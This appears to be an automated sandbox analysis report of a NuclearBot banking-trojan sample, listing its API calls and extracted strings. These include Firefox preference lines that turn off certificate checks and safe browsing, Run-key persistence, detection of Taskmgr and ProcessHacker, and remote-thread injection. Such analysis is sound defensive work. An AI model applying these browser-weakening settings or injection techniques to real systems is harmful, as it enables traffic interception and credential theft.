                                                                                                                                                                                                                                  • String ID: \prefs.js$browser.tabs.remote.autostart$browser.tabs.remote.autostart.2$firefox.exe$gfx.direct2d.disabled$layers.acceleration.disabled$network.http.spdy.enabled$network.http.spdy.enabled.v3$network.http.spdy.enabled.v3-1$network.stricttransportsecurity.preloadlist$user_pref("browser.safebrowsing.downloads.remote.enabled", false);$user_pref("browser.safebrowsing.downloads.remote.url", "");$user_pref("browser.safebrowsing.malware.enabled", false);$user_pref("browser.safebrowsing.phishing.enabled", false);$user_pref("browser.ssl_override_behavior", 1);$user_pref("browser.tabs.remote.autostart", false);$user_pref("browser.tabs.remote.autostart.2", false);$user_pref("browser.xul.error_pages.expert_bad_cert", true);$user_pref("dom.security.https_only_mode", false);$user_pref("gfx.direct2d.disabled", true);$user_pref("layers.acceleration.disabled", true);$user_pref("network.auth.non-web-content-triggered-resources-http-auth-allow", true);$user_pref("network.http.altsvc.enabled", false);$user_pref("network.http.enforce-framing.strict_chunked_encoding", false);$user_pref("network.http.http2.enabled", false);$user_pref("network.http.http3.enable", false);$user_pref("network.http.http4.enable", false);$user_pref("network.http.max_response_headers_kb", -1);$user_pref("network.http.response.timeout", -1);$user_pref("network.http.spdy.enabled", false);$user_pref("network.http.spdy.enabled", false);user_pref("network.http.spdy.enabled.http2", false);user_pref("network.http.spdy.e$user_pref("network.http.spdy.enabled.v3", false);$user_pref("network.http.spdy.enabled.v3-1", false);$user_pref("network.http.spdy.enabled.v3-1", false);user_pref("network.http.spdy.enabled.v3", false);user_pref("network.http.spdy$user_pref("network.http.version", 1);$user_pref("network.stricttransportsecurity.preloadlist", false);$user_pref("network.trr.no_warn_on_network_change", true);$user_pref("network.trr.send_empty_accept-encoding_headers", true);$user_pref("privacy.donottrackheader.enabled", false);$user_pref("privacy.firstparty.isolate", false);$user_pref("privacy.trackingprotection.enabled", false);$user_pref("security.OCSP.require", false);$user_pref("security.cert_pinning.enforcement_level", 0);$user_pref("security.csp.enable", false);$user_pref("security.enterprise_roots.enabled", true);user_pref("security.ssl.errorReporting.enabled", false);user_pref("security$user_pref("security.fileuri.origin_policy", 0);$user_pref("security.fileuri.strict_origin_policy", false);$user_pref("security.mixed_content.block_display_content", false);$user_pref("security.mixed_content.block_object_subrequest", false);$user_pref("security.sri.enable", false);$user_pref("security.ssl.enable_ocsp_stapling", false);$user_pref("security.tls.insecure_alerts", false);$user_pref("security.tls.insecure_fallback_hosts.use_static_list", false);$user_pref("security.tls.version.fallback-limit", 4);$user_pref("security.tls.version.max", 4);$user_pref("security.tls.version.min", 1);$user_pref("security.xss_detection.main_thread_script_filter", false);
                                                                                                                                                                                                                                  • API String ID: 1031472439-2660148757
                                                                                                                                                                                                                                  • Opcode ID: 3ed3324dc988d84eba29ecc3c0b0898e6ce25bc4d203d90b0b2130766b496fad
                                                                                                                                                                                                                                  • Instruction ID: 3647af6c15ef7b85e5cd5d4b5077901b3a8b2dc400677f3e91b8f4899b22754c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ed3324dc988d84eba29ecc3c0b0898e6ce25bc4d203d90b0b2130766b496fad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6D24E62656AC6E9EB30DF24CC906EC2761FF55388F805036DA8D9B999EF39D709C340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AdjustCloseInformationPrivilegeProcessProcess32Sleep$CreateFirstHandleNextOpenSnapshotToolhelp32Value
                                                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Software\Microsoft\Windows\CurrentVersion\Run$Taskmgr.exe$chrome.exe$chrome.exe$firefox.exe$firefox.exe$msedge.exe$msedge.exe
                                                                                                                                                                                                                                  • API String ID: 3550313185-4193319559
                                                                                                                                                                                                                                  • Opcode ID: 34b4021d4c87d332943d79067152d8067720cf9077b2f7bb1919dcdc7d4f019f
                                                                                                                                                                                                                                  • Instruction ID: ca3032e7961f662f86952b18c6839818100e5df8d74ecc5e9c921c121c159f79
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34b4021d4c87d332943d79067152d8067720cf9077b2f7bb1919dcdc7d4f019f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B919531A1D682E6EB10DB20E5506AA7F61FF81784F8401B9EDDD83AA5DF3DE509CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invoke_watsonfree$Wcsftime_wcstombs_s_l$CurrentProcessSleep_call_reportfault_calloc_crt_calloc_impl_getptd_lock_malloc_crt_mbstowcs_s_l_wsetlocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2618247045-0
                                                                                                                                                                                                                                  • Opcode ID: 99458977b64c940a5e9949b1fc814d56461b629e867f3d912420e1e6e2ddbe44
                                                                                                                                                                                                                                  • Instruction ID: 57f1aa5e6d6c41fe5e40d994b8e6b6e23fc75d0c28e77764002c2f3251f79455
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99458977b64c940a5e9949b1fc814d56461b629e867f3d912420e1e6e2ddbe44
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03610632A2A742E2F7288B25965067A7A91BF84794F584679EEDEC3BD5CF7CD000C600
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale$Info$__crt$_calloc_crtfree$A_statErrorLastSleepUpdateUpdate::__calloc_impl_invoke_watson
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 411824461-0
                                                                                                                                                                                                                                  • Opcode ID: f48a9d2d8b30ce870815513dc9c1c6bbe85c3dab931c00d49a8746bc3a8b3a5c
                                                                                                                                                                                                                                  • Instruction ID: b27de57119043392cfe2accc377cf4ad3754e9df1853bc73b539acd802eddbac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f48a9d2d8b30ce870815513dc9c1c6bbe85c3dab931c00d49a8746bc3a8b3a5c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1251F522F1A642E1FB609A22A6117BA1AD17F84FC4F88557DDD9DDBB86DE3CE400C640
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCreateCurrentLookupObjectPrivilegePrivilegesSingleSnapshotToolhelp32ValueWait
                                                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                  • API String ID: 380803426-2896544425
                                                                                                                                                                                                                                  • Opcode ID: 1ea432eeae664be0e19b7b2aaa70897d00c3826b4a7224168c486326e0c1472a
                                                                                                                                                                                                                                  • Instruction ID: eb796d5adb2c13214eb1c66bc12577fd999d9c6fca26066473aecc743c663e18
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ea432eeae664be0e19b7b2aaa70897d00c3826b4a7224168c486326e0c1472a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92819022B4AA42E5FB51CB71D8103AD3BA2BF45BA8F404679CEAD977D9CE38D145C340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$FirstFolderNextPath
                                                                                                                                                                                                                                  • String ID: \Mozilla\Firefox\Profiles\$release
                                                                                                                                                                                                                                  • API String ID: 2825019445-1178070541
                                                                                                                                                                                                                                  • Opcode ID: 27033247f02ea954e8275b56671a67b10e467c466793a94af67419d15f0e5e72
                                                                                                                                                                                                                                  • Instruction ID: 67c2de3744d1a4dd677b3cf2c1c834de8bf1631b599ff35462ef375fd3be5ac0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27033247f02ea954e8275b56671a67b10e467c466793a94af67419d15f0e5e72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B91BE32A1AB42E6EB10CF64D8800AD3BB5FF40798F405179DE9DA7AA9DF38E155C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 1113946311-2766056989
                                                                                                                                                                                                                                  • Opcode ID: 9990b832d10dddb3be58a87393efd9fc684c304d26788c0b604a58e1d2f95735
                                                                                                                                                                                                                                  • Instruction ID: d806ca5ac8e71203fe790487259c3e5b952d0eac560195cbb1d626af62bd8e45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9990b832d10dddb3be58a87393efd9fc684c304d26788c0b604a58e1d2f95735
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3121BB2170A642A6EB258F12A94163ABEA1BF4CFC4F48413CDE8D93B58DF3CD005CB00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                  • Opcode ID: 1e454a4bd982196a97192b098099581b8af041b991a4dc92c4bc31d3252acf6c
                                                                                                                                                                                                                                  • Instruction ID: 55a68ebe945f74bd2d668695937a4953ea4ed33a830a5c423ff29a3bd2e7eabc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e454a4bd982196a97192b098099581b8af041b991a4dc92c4bc31d3252acf6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9116321A4D642E2EB20CB11E45437A6BA1BF48B94F5042B9DDED83B94DF3CE50ACA00
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FolderPath$FileModuleName
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 906376703-0
                                                                                                                                                                                                                                  • Opcode ID: e12e1df25e00b270c98f9d2c50c0c62431dded8424c62ee45222e96d30c3c4bf
                                                                                                                                                                                                                                  • Instruction ID: 803b6d542d4305a23921be73faa9853fba98584341c73d527605738c8f1b9c0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e12e1df25e00b270c98f9d2c50c0c62431dded8424c62ee45222e96d30c3c4bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70219622649782E1EB708B10E4447AB67A4FF84795F401139DEED83A95DF3CD105C700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 3192549508-1018135373
                                                                                                                                                                                                                                  • Opcode ID: a9bbc5783572fe79802af9e5177148177d622e0359cb5925f542bea3ea13f282
                                                                                                                                                                                                                                  • Instruction ID: 8227fd8e9d50c8d1652d6a4e87a3b8046e74fe0d3935afcaa22d08de0223b127
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9bbc5783572fe79802af9e5177148177d622e0359cb5925f542bea3ea13f282
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFE02B21F06003D1EB586F3585C90782AE1FF94720FE414B9CA4DE2381DE1CE9CAC700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetOpenW.WININET ref: 00007FF68A187373
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetOpenUrlW.WININET ref: 00007FF68A1873A7
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetOpenUrlW.WININET ref: 00007FF68A1873D6
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A1873E7
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: Sleep.KERNEL32 ref: 00007FF68A187359
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: HttpQueryInfoA.WININET ref: 00007FF68A187447
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: GetProcessHeap.KERNEL32 ref: 00007FF68A187451
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: HeapAlloc.KERNEL32 ref: 00007FF68A187462
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A187473
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetReadFile.WININET ref: 00007FF68A1874AA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A1874BB
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A18731C: InternetCloseHandle.WININET ref: 00007FF68A1874C4
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A185AC0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF68A185B05
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A185AC0: Process32FirstW.KERNEL32 ref: 00007FF68A185B2A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A185AC0: CloseHandle.KERNEL32 ref: 00007FF68A185B87
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A185AC0: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF68A1872C1
                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF68A188998
                                                                                                                                                                                                                                  • CreateThread.KERNEL32 ref: 00007FF68A1889B5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A1883E8: RtlAdjustPrivilege.NTDLL ref: 00007FF68A188443
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A1883E8: NtSetInformationProcess.NTDLL ref: 00007FF68A18845D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A1883E8: Sleep.KERNEL32 ref: 00007FF68A1885F6
                                                                                                                                                                                                                                    • Part of subcall function 00007FF68A1883E8: Sleep.KERNEL32 ref: 00007FF68A188673
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$CreateOpenSleep$HeapProcessThread$AdjustAllocFileFirstHttpInfoInformationIos_base_dtorPrivilegeProcess32QueryReadSnapshotToolhelp32std::ios_base::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1906031915-0
                                                                                                                                                                                                                                  • Opcode ID: 7f176978def952677b8ee24faf4b3ff694f8d3dd7d4e1fdb9a5eaa081bf95096
                                                                                                                                                                                                                                  • Instruction ID: f64600aa4af33cf808bf61e98601f0c7fb5e5648d99d96f5632f77c77f35de2e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f176978def952677b8ee24faf4b3ff694f8d3dd7d4e1fdb9a5eaa081bf95096
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60313B33A1AB12E5F7109FA0E8406DD3B75BF44768F54167AED9CA2EA4DF38914AC300
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: ac999b8a5df659a7e9270163a343038d070dede47a62065c90b7984cfe182448
                                                                                                                                                                                                                                  • Instruction ID: 477242c37fd9ffc75ee836b7f8c7b5c386372fb87e3ff565c300f2cb2c682fb2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac999b8a5df659a7e9270163a343038d070dede47a62065c90b7984cfe182448
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$Open$Heap$AllocFileHttpInfoProcessQueryReadSleep
                                                                                                                                                                                                                                  • String ID: NuclearBot
                                                                                                                                                                                                                                  • API String ID: 210480886-821128150
                                                                                                                                                                                                                                  • Opcode ID: 1e8c98ae91c802a57b132e6c08420ea60fbe6bff182261198396aa96d2c24d7c
                                                                                                                                                                                                                                  • Instruction ID: fc649346b33e8dde618779d6561e57e70465205d2b954cf01f2ba1cea3864438
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e8c98ae91c802a57b132e6c08420ea60fbe6bff182261198396aa96d2c24d7c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B51503561A642D6EB209F22E89462A7B61FF44B88F001079DEDE87B55DF3CE458C744
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockmessagesstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad cast$unknown error
                                                                                                                                                                                                                                  • API String ID: 620047600-2424861499
                                                                                                                                                                                                                                  • Opcode ID: 32bfaffed2e4ff8b87b6feef9a6b935824c54c53ba7fb93c474e9d09f019db24
                                                                                                                                                                                                                                  • Instruction ID: ed133ab880c4b7378a3d725e73dff20c321d691bbd74be738c92af07b03c0bc4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32bfaffed2e4ff8b87b6feef9a6b935824c54c53ba7fb93c474e9d09f019db24
